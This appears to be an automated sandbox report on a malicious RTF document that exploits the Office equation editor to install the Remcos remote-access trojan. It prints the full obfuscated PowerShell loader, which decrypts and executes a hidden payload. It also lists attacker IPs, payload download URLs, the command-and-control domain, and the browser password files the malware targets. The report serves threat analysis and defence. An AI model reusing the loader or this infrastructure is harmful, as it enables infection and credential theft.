                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe8_2_004120F7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00419627 mouse_event,8_2_00419627
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command (('((e4jfunction decrypt-aesencryption {param([string]tmibase64text,[stringe4j+e4j]tmikey)tmie4j+e4jaesmanaged = new-object system.see4j+e4jcurity.cryptography.aesmanaged;tmia'+'esmanagee4j+e4'+'jd.modee4j+e4j = [syse4j+'+'e4jtem.security.cryptoge4j+e4jraphy.e4j+e'+'4jcie4'+'j+e4jphermode]::cbc;tmiaesmanaged.'+'pae4j+e4jddin'+'g = [system.security.cryptography.paddingmode]::zeros;tmiaesmanaged.blocksiz'+'e = 128;tmiaesmanaged.keysize = 256;'+'tmiaesmanagee4j+'+'e4jd.key = ('+'new-objecte4'+'j+e4j system.security.cryptography.sha256managed).computehash([syste'+'m.text.encoding]::utf8.gee4j+e4jtbytes(tmikey));tmicipherbytes = [syst'+'em.convert]::frombase64string(tmibase64text);tmiaesmanaged.iv '+'= tmicipherbytes[0..15];tmidecryptor = tmiaesmanaged.createdecryptor();tmidecryptedbytes = tmidecryptor.transformfin'+'alblock(tmicipherbytes, 16, tmicipherbytes.length - 16);e4j+e4jtmiae'+'smanaged.d'+'ispose('+');return [system.text.encoding]::utf8.getstring'+'(tmidecry'+'ptedbytes).tre4j+e4jim([char]0);}tmichave = cni87355924191917571657221755980918cnie4j+e4j;tmitextocriptogr'+'afadobase4j+e4je64 = 
'+'cniunstmxui0hgfw3fdm1ert/tun0ubdloiqyhjlmxqihnecjctgq65plkspfurkcdrjeph4ihki2ib6ldmk9phm3xxkeni+fcksxpwgqqchotbxmi5gehoxzdilkulsmhsrgtrat4hlirjclijfhhppopad8wrrnjoaupibq8ljkcbyxn79xvshb07yd11fez/xbrm4eb0d6odjgtxhylrzf6j4efba9grgmdc4tkwy2zlmyr0bfez+txcikx6moawodsdqcjz8w7gbp0wx7cdbpibhixab4r+prvgaccg+0+3uep7n/ketdvanulujk7wm0vfcbyd/wvrtzf4youzwmoc3oacf/jrshl+say08x0qppscnvwz86ojjuoepgjsv67aspbpc+mt7exhdg3nzcev9ovnfyyq2mja+oyhp/f7vijb0t7gbdynwme4hifbgrkzkghh0vlgzbfsozqmmnyatrwwng1stwukeon1tmwo+gg02ry5xyl9dvsfohoro3yjn0n+knyfsitsld8vprgssvo3vdtrx83pc61aekuwgmokozlk3nzebypc+p8jh/rc5lwja5zr77tsv/3ml20f7os9kdmcybjegjeqbi2go74vj2welc1ow7mmkvohzmjpl4lbdccde3+rcmbilqbycalcm5aunss21ha2+mb9sy0fop8ez4uefmsux1rlq2l4c8nimjoagijgqysi/8/4pvnnd/sdhqf9jv/rjy+djdtvgcjd3eg+777e0i3zy2wwu4edo5corcrrao0qh5kucez0fy+pfnv3ycp5njlg3ee0phzw6smpaer25mwo6sdwnn/dbc6kjxcnudmbo0nsge1naamlvsvxyb09sotlfoqfki1htvgxntwgomcwso9fqjz6v2g6lgaw0fsjkoc9ekynuz2i6adevqhjebtb0xhr2feqyelq/pzpkskekgit2hk3lviwcmienjwqnjfen61s15yu2edgjit9mn3n8vslm2edkyhvsdcmrf7gu/p8wb6oknxnhosycbbbfwxbrtzltr07jaiq87pigqkxkltip+st5jln1rkhuvinakangwfm28rb84mkuqgixbyiubzntatp97cvhahwn4pxpi1kez7/kbaddkxcvvkn3tk4hlxc8ot+rpc8cczkwpzacgoszxk3wprlhnyjtq6zn0qe6sroqcie3ffggvicerreowxqvbpiw9usza17osc636m5zxstoqghiyakm/ddk+whfmdjgisve2wrgdtoq0qt+tggtb9bi3fkjgvpbcuwm1jpuhv/lpydidnqeldtlskziqiivm6lt/byy7al9k4rbqb6ijepuxyhndju46lxfgrasgd2xga6ahtgriacii6eaxgjsunerp5ivok6tfqctmutwbb720zk5bpukq==cni;tmitextodescriptografado = decrypt-aesencryption -'+'base64text tmitextocriptografadobase64 -key tmichave;w'+'rite-host cnitexe4j+e4jto descre4j+e4jiptografado: tmi'+'textodescriptograe4j+e4jfadocni;invoke-expressioe4j+e4jn tmitext'+'oe4j+e4jdescriptografado;e4j)-replace ([char]67+[char]110+['+'char]73),[char]34 -crepJump to behavior
                Source: RegAsm.exe, 00000008.00000002.879647352.00000000008CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerChrome Mode] - Microsoft Wordsilogf
                Source: RegAsm.exe, 00000008.00000002.879647352.00000000008CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerLX\
                Source: RegAsm.exe, 00000008.00000002.879647352.0000000000871000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: RegAsm.exe, 00000008.00000002.879647352.0000000000871000.00000004.00000020.00020000.00000000.sdmp, logs.dat.8.drBinary or memory string: [Program Manager]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00434C52 cpuid 8_2_00434C52
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_00452036
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_004520C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,8_2_00452313
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_00448404
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_0045243C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,8_2_00452543
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_00452610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,8_2_0040F8D1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,8_2_004488ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,8_2_00451CD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_00451F50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_00451F9B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00448957 GetSystemTimeAsFileTime,8_2_00448957
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041B60D GetUserNameW,8_2_0041B60D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,8_2_00449190
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.36e9a80.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.3f87e48.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.879647352.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879647352.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879647352.0000000000871000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879945414.0000000000DFE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879647352.0000000000855000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3228, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data8_2_0040BA12
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\8_2_0040BB30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db8_2_0040BB30

                Remote Access Functionality

                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-9R4HLXJump to behavior
                Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.36e9a80.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.3f87e48.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.879647352.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879647352.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879647352.0000000000871000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879945414.0000000000DFE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879647352.0000000000855000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3228, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe8_2_0040569A
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information121
                Scripting
                Valid Accounts1
                Native API
                121
                Scripting
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services11
                Archive Collected Data
                13
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts53
                Exploitation for Client Execution
                1
                DLL Side-Loading
                1
                Bypass User Account Control
                2
                Obfuscated Files or Information
                211
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol211
                Input Capture
                2
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts221
                Command and Scripting Interpreter
                1
                Windows Service
                1
                Access Token Manipulation
                1
                DLL Side-Loading
                2
                Credentials In Files
                1
                System Service Discovery
                SMB/Windows Admin Shares3
                Clipboard Data
                1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                Service Execution
                Login Hook1
                Windows Service
                1
                Bypass User Account Control
                NTDS3
                File and Directory Discovery
                Distributed Component Object ModelInput Capture1
                Remote Access Software
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud Accounts2
                PowerShell
                Network Logon Script222
                Process Injection
                1
                Masquerading
                LSA Secrets34
                System Information Discovery
                SSHKeylogging2
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                Virtualization/Sandbox Evasion
                Cached Domain Credentials2
                Security Software Discovery
                VNCGUI Input Capture212
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Access Token Manipulation
                DCSync21
                Virtualization/Sandbox Evasion
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job222
                Process Injection
                Proc Filesystem3
                Process Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                Application Window Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Owner/User Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                Remote System Discovery
                Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                Behavior Graph ID: 1484115   Sample: 4vzwJTZbwT.rtf   Startdate: 29/07/2024   Architecture: WINDOWS   Score: 100
                Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 22 other signatures
                WINWORD.EXE 336 17 started
                • dropped: C:\Users\...\~WRD0000.tmp:Zone.Identifier (ASCII); C:\Users\user\Desktop\~WRD0000.tmp (Rich); C:\Users\user\Desktop\4vzwJTZbwT.rtf (copy) (Rich); ~WRF{1F49877E-68B7...1-09D774B073D0}.tmp (Composite)
                EQNEDT32.EXE 12 started by WINWORD.EXE
                • network: 172.245.123.11, ports 49163, 49165, 80, AS-COLOCROSSINGUS, United States
                • dropped: C:\...\weseethesimplethingsalwaystog.vBS (Unicode)
                • signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                wscript.exe 1 started by EQNEDT32.EXE
                • signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Obfuscated command line found; 3 other signatures
                powershell.exe 12 5 started by wscript.exe
                • network: 198.46.176.133, ports 49164, 80, AS-COLOCROSSINGUS, United States
                • signatures: Writes to foreign memory regions; Suspicious execution chain found; Injects a PE file into a foreign processes
                RegAsm.exe 3 13 started by powershell.exe
                • network: tochisglobal.ddns.net -> 103.253.17.222, ports 49166, 6426, WIFIKU-AS-IDPTWifikuIndonesiaID, unknown; geoplugin.net -> 178.237.33.50, ports 49167, 80, ATOM86-ASATOM86NL, Netherlands
                • dropped: C:\ProgramData\remcos\logs.dat (data)
                • signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionality to steal Chrome passwords or cookies; 4 other signatures; Uses dynamic DNS services (tochisglobal.ddns.net)



                Source | Detection | Scanner | Label
                4vzwJTZbwT.rtf | 50% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882
                4vzwJTZbwT.rtf | 100% | Avira | HEUR/Rtf.Malformed
                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1F49877E-68B7-4001-A271-09D774B073D0}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
                C:\Users\user\Desktop\~WRD0000.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://geoplugin.net/json.gp | 0% | URL Reputation | safe
                http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
                http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
                https://contoso.com/ | 0% | URL Reputation | safe
                https://nuget.org/nuget.exe | 0% | URL Reputation | safe
                https://contoso.com/License | 0% | URL Reputation | safe
                https://contoso.com/Icon | 0% | URL Reputation | safe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                http://go.micro | 0% | Avira URL Cloud | safe
                http://172.245.123.11/47/BEN.txt | 0% | Avira URL Cloud | safe
                http://172.245.123.11/47/weseethesimplethingsalwaystoget.gIF | 100% | Avira URL Cloud | malware
                http://172.245.123.11/47/weseethesimplethingsalwaystoget.gIFj | 0% | Avira URL Cloud | safe
                tochisglobal.ddns.net | 0% | Avira URL Cloud | safe
                http://198.46.176.133/Upload/vbs.jpeg | 100% | Avira URL Cloud | malware
                http://172.245.123.11 | 0% | Avira URL Cloud | safe
                http://198.46.176.133 | 0% | Avira URL Cloud | safe
                http://go.microsofy | 0% | Avira URL Cloud | safe
                http://geoplugin.net/json.gp9k | 0% | Avira URL Cloud | safe
                http://go.micros= | 0% | Avira URL Cloud | safe
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                tochisglobal.ddns.net | 103.253.17.222 | true | true | | unknown
                geoplugin.net | 178.237.33.50 | true | false | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
                http://172.245.123.11/47/BEN.txt | true | Avira URL Cloud: safe | unknown
                http://198.46.176.133/Upload/vbs.jpeg | false | Avira URL Cloud: malware | unknown
                tochisglobal.ddns.net | true | Avira URL Cloud: safe | unknown
                http://172.245.123.11/47/weseethesimplethingsalwaystoget.gIF | true | Avira URL Cloud: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://nuget.org/NuGet.exe | powershell.exe, 00000006.00000002.373610773.00000000035A9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://go.micro | powershell.exe, 00000006.00000002.374984057.0000000005101000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://geoplugin.net/json.gp/C | powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://172.245.123.11 | powershell.exe, 00000006.00000002.377227143.0000000009331000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://172.245.123.11/47/weseethesimplethingsalwaystoget.gIFj | EQNEDT32.EXE, 00000002.00000002.357699051.00000000008DF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://contoso.com/ | powershell.exe, 00000006.00000002.373610773.00000000035A9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://nuget.org/nuget.exe | powershell.exe, 00000006.00000002.373610773.00000000035A9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://geoplugin.net/json.gp9k | RegAsm.exe, 00000008.00000002.879647352.00000000008B5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://contoso.com/License | powershell.exe, 00000006.00000002.373610773.00000000035A9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://contoso.com/Icon | powershell.exe, 00000006.00000002.373610773.00000000035A9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://go.microsofy | powershell.exe, 00000006.00000002.374984057.0000000005101000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000006.00000002.373509848.0000000002581000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://198.46.176.133 | powershell.exe, 00000006.00000002.373509848.00000000026BB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://go.micros= | powershell.exe, 00000006.00000002.374984057.0000000005101000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
198.46.176.133 | unknown | United States | 36352 | AS-COLOCROSSINGUS | false
103.253.17.222 | tochisglobal.ddns.net | unknown | 59139 | WIFIKU-AS-IDPTWifikuIndonesiaID | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
172.245.123.11 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1484115
Start date and time: 2024-07-29 16:14:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 5s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 4vzwJTZbwT.rtf (renamed because the original name is a hash value)
Original Sample Name: 7279ab0fbc0a02d8b6966ed3cdf67aca.rtf
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winRTF@8/18@2/4
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 70
• Number of non-executed functions: 194
Cookbook Comments:
• Found application associated with file extension: .rtf
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Override analysis time to 79366.7789945727 for current running targets taking high CPU consumption
• Override analysis time to 158733.557989145 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Execution Graph export aborted for target EQNEDT32.EXE, PID 2644 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: 4vzwJTZbwT.rtf
Time | Type | Description
10:15:00 | API Interceptor | 80x Sleep call for process: EQNEDT32.EXE modified
10:15:04 | API Interceptor | 23x Sleep call for process: wscript.exe modified
10:15:05 | API Interceptor | 22x Sleep call for process: powershell.exe modified
10:15:12 | API Interceptor | 9930893x Sleep call for process: RegAsm.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
198.46.176.133
• NySTAwCpzK.rtf | malicious | Remcos | 198.46.176.133/Upload/vbs.jpeg
• PI-002312.xls | malicious | Remcos | 198.46.176.133/Upload/vbs.jpeg
